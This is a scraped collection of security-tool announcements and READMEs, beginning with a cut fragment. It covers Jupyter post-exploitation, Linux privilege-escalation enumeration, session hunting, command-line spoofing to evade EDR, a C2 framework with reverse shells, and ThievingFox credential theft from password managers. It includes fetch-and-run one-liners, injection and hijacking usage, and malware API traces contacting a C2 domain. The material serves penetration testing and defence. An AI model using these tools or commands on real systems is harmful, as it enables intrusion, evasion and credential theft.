    Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system

    Report here

    Credit



    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Unknown

    Β 


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

    By: Zion3R

    V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

    User Stories

    • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
    • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
    • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
    • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

    Usage

    Initial Setup

    1. pip install vger
    2. vger --help

    Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

    Commands

    Once a connection is established, users drop into a nested set of menus.

    The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

    These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

    Experimental

    With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

    There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

    Examples



    Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

    By: Zion3R


    First, a couple of useful oneliners ;)

    wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
    curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

    Note that since version 2.10 you can serve the script to other hosts with the -S flag!


    linux-smart-enumeration

    Linux enumeration tools for pentesting and CTFs

    This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

    Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

    What is it?

    This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

    From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

    It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

    It has 3 levels of verbosity so you can control how much information you see.

    In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

    By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

    How to use it?

    The idea is to get the information gradually.

    First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

    If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

    If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

    You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

    Use: ./lse.sh [options]

    OPTIONS
    -c Disable color
    -i Non interactive mode
    -h This help
    -l LEVEL Output verbosity level
    0: Show highly important results. (default)
    1: Show interesting results.
    2: Show all gathered information.
    -s SELECTION Comma separated list of sections or tests to run. Available
    sections:
    usr: User related tests.
    sud: Sudo related tests.
    fst: File system related tests.
    sys: System related tests.
    sec: Security measures related tests.
    ret: Recurren tasks (cron, timers) related tests.
    net: Network related tests.
    srv: Services related tests.
    pro: Processes related tests.
    sof: Software related tests.
    ctn: Container (docker, lxc) related tests.
    cve: CVE related tests.
    Specific tests can be used with their IDs (i.e.: usr020,sud)
    -e PATHS Comma separated list of paths to exclude. This allows you
    to do faster scans at the cost of completeness
    -p SECONDS Time that the process monitor will spend watching for
    processes. A value of 0 will disable any watch (default: 60)
    -S Serve the lse.sh script in this host so it can be retrieved
    from a remote host.

    Is it pretty?

    Usage demo

    Also available in webm video


    Level 0 (default) output sample


    Level 1 verbosity output sample


    Level 2 verbosity output sample


    Examples

    Direct execution oneliners

    bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
    bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


    Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

    By: Zion3R


    Retrieve and display information about active user sessions on remote computers. No admin privileges required.

    The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

    If the -CheckAdminAccess switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)

    It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.


    Usage:

    iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

    If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

    Invoke-SessionHunter

    Gather sessions by authenticating to targets where you have local admin access

    Invoke-SessionHunter -CheckAsAdmin

    You can optionally provide credentials in the following format

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

    You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

    This works in cobination with -Timeout | Default = 2, increase for slower networks.

    Invoke-SessionHunter -FailSafe
    Invoke-SessionHunter -FailSafe -Timeout 5

    Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

    Invoke-SessionHunter -Match

    All switches can be combined

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

    Specify the target domain

    Invoke-SessionHunter -Domain contoso.local

    Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

    Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
    Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

    Retrieve and display information about active user sessions on servers only

    Invoke-SessionHunter -Servers

    Retrieve and display information about active user sessions on workstations only

    Invoke-SessionHunter -Workstations

    Show active session for the specified user only

    Invoke-SessionHunter -Hunt "Administrator"

    Exclude localhost from the sessions retrieval

    Invoke-SessionHunter -IncludeLocalHost

    Return custom PSObjects instead of table-formatted results

    Invoke-SessionHunter -RawResults

    Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

    Note: if a host is not reachable it will hang for a while

    Invoke-SessionHunter -NoPortScan


    LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

    By: Zion3R


    LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


    Why

    Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

    How

    1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
    2. Spawns that suspended LOLBin with the spoofed command line
    3. Gets the remote PEB address
    4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
    5. Gets the address of the command line unicode buffer
    6. Overrides the fake command line with the real one
    7. Resumes the main thread

    Opsec considerations

    Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory

    Build

    Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

    nimble install winim

    Known issue

    Programs that clear or change the previous printed console messages (such as timeout.exe 10) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.



    Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

    By: Zion3R


    A command line Windows API tracing tool for Golang binaries.

    Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!


    How it works?

    Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.

    The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.

    Asmstdcall receives a single parameter which is pointer to something similar to the following structure:

    struct LIBCALL {
    DWORD_PTR Addr;
    DWORD Argc;
    DWORD_PTR Argv;
    DWORD_PTR ReturnValue;

    [...]
    }

    Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

    The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.

    The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

    If you want to know more about this project and research check the blogpost.

    Installation

    Download the latest release.

    Usage

    1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
    2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
    3. Run gftrace.exe passing the target Golang program path as a parameter.
    gftrace.exe <filepath> <params>

    Configuration

    All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:

    CreateFileW,ReadFile,CreateProcessW

    The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.

    The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.

    Examples

    Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

    - CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
    - CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

    Tracing CreateProcessW() in the TunnelFish malware:

    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

    [...]

    Tracing multiple functions in the Sunshuttle malware:

    - CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
    - WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
    - WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
    - WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
    - WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
    - WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

    [...]

    Tracing multiple functions in the DeimosC2 framework agent:

    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
    - setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
    - socket(0x2, 0x1, 0x6) = 0x138 (312)
    - WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
    - GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
    - GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
    - LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
    - NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
    - GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
    - GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
    - CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
    - GetCurrentProcessId() = 0x2584 (9604)
    - GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )

    [...]

    Future features:

    • [x] Support inspection of 32 bits files.
    • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
    • [x] Add support to cmdline parameters for the target process
    • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

    :warning: Warning

    • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
    • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.

    License

    The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



    C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

    By: Zion3R


    The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

    C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

    Reverse shells support:

    1. Reverse TCP
    2. Reverse HTTP
    3. Reverse HTTPS (configure it behind an LB)
    4. Telegram C2

    Demo

    C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
    Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
    Telegram C2: https://youtu.be/WLQtF4hbCKk

    Key Features

    πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
    πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
    πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
    πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

    Tech Stack

    πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
    πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
    🌐 Nginx: Effortlessly routing traffic between web and backend systems.
    πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
    πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
    πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

    Architecture

    Application setup

    • Management port: 9000
    • Reversse HTTP port: 8000
    • Reverse TCP port: 8888

    • Clone the repo

    • Optional: Update chait_id, bot_token in c2-telegram/config.yml
    • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

    Credits

    Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

    License

    Distributed under the MIT License. See LICENSE for more information.

    Contact



    OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

    By: Zion3R


    Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


    Features

    1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

    2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

    3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

    4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.

    Future Features

    This project is actively developed, and future features may include:

    1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
    2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

    Installation

    The tool only requires Python 3 at the moment.

    1. step1: git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
    2. step2: cd OSTE-Web-Log-Analyzer
    3. step3: python3 WLA-cli.py

    Usage

    After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t

    use -h or --help for more detailed usage examples : python3 WLA-cli.py -h

    Contact

    linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)



    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R


    ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

    The accompanying blog post can be found here


    Installation

    Linux

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    The mingw-w64 package must be installed. On Debian, this can be done using :

    apt install mingw-w64

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

    Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

    After adding Mono repositories, Nuget can be installed using apt :

    apt install nuget

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11.

    Windows

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

    .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11

    NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

    Targets

    All modules have been tested on the following Windows versions :

    Windows Version
    Windows Server 2022
    Windows Server 2019
    Windows Server 2016
    Windows Server 2012R2
    Windows 10
    Windows 11

    [!CAUTION] Modules have not been tested on other version, and are expected to not work.

    Application Injection Method
    KeePass.exe AppDomainManager Injection
    KeePassXC.exe DLL Proxying
    LogonUI.exe (Windows Login Screen) COM Hijacking
    consent.exe (Windows UAC Popup) COM Hijacking
    mstsc.exe (Windows default RDP client) COM Hijacking
    RDCMan.exe (Sysinternals' RDP client) COM Hijacking
    MobaXTerm.exe (3rd party RDP client) COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

    For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

    --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --ke epassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

    For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

    For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

    [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
